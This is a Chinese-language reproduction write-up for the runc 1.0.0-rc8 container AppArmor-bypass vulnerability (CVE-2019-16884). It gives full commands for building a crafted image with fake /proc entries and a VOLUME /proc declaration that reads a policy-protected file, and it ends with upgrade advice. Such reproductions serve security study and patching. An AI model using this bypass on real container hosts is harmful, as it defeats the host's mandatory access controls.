影响范围
runc 1.0.0-rc8
漏洞类型
容器逃逸漏洞
利用条件
影响范围应用
漏洞概述
在Docker 19.03. 2-ce和其他产品中使用的runc 1.0.0-rc8允许绕过AppArmor限制,因为libcontainer/rootfs_linux.go错误地检查装载目标,攻击者可以在容器镜像中可以声明一个VOLUME并挂载至/proc,之后欺骗runc使其认为AppArmor已经成功应用从而绕过AppArmor策略,该漏洞由Adam Iwaniuk发现并在DragonSector CTF 2019期间披露,这个CTF题目挑战将一个文件挂载到/flag-<random>,并使用AppArmor策略拒绝访问该文件,选手可以利用这个漏洞来禁用这个策略并读取文件
漏洞环境
构建实验环境:
docker run -it ssst0n3/docker_archive:CVE-2019-16884
ubuntu login: root
Password: root
漏洞复现
Step 1:创建apparmor规则
cat > /etc/apparmor.d/no_flag <<EOF
#include <tunables/global>
profile no_flag flags=(attach_disconnected,mediate_deleted) {
#include <abstractions/base>
file,
deny /flag r,
}
EOF
Step 2:创建一个flag文件
echo \\\"Al1ex is comming\\\" > /tmp/flag
Step 3:应用规则
/sbin/apparmor_parser --replace --write-cache /etc/apparmor.d/no_flag
Step 4:启动一个正常镜像此时无权限读取/flag内容
docker run --rm --security-opt \\\"apparmor=no_flag\\\" -v /tmp/flag:/flag busybox cat /flag
cat: can\\\'t open \\\'/flag\\\': Permission denied
Step 4:利用漏洞启用一个恶意镜像,可以读取/flag
mkdir -p rootfs/proc/self/{attr,fd}
touch rootfs/proc/self/{status,attr/exec}
touch rootfs/proc/self/fd/{4,5}
cat <<EOF > Dockerfile
FROM busybox
ADD rootfs /
VOLUME /proc
EOF
docker build -t apparmor-bypass .
docker run --rm --security-opt \\\"apparmor=no_flag\\\" -v /tmp/flag:/flag apparmor-bypass cat /flag
Al1ex is comming!!!
docker: Error response from daemon: cannot start a stopped process: unknown.
安全建议
升级到最新版本
参考链接
https://github.com/opencontainers/runc/issues/2128
https://bugzilla.redhat.com/show_bug.cgi?id=1757214
原创文章,作者:七芒星实验室,如若转载,请注明出处:https://www.sudun.com/ask/34148.html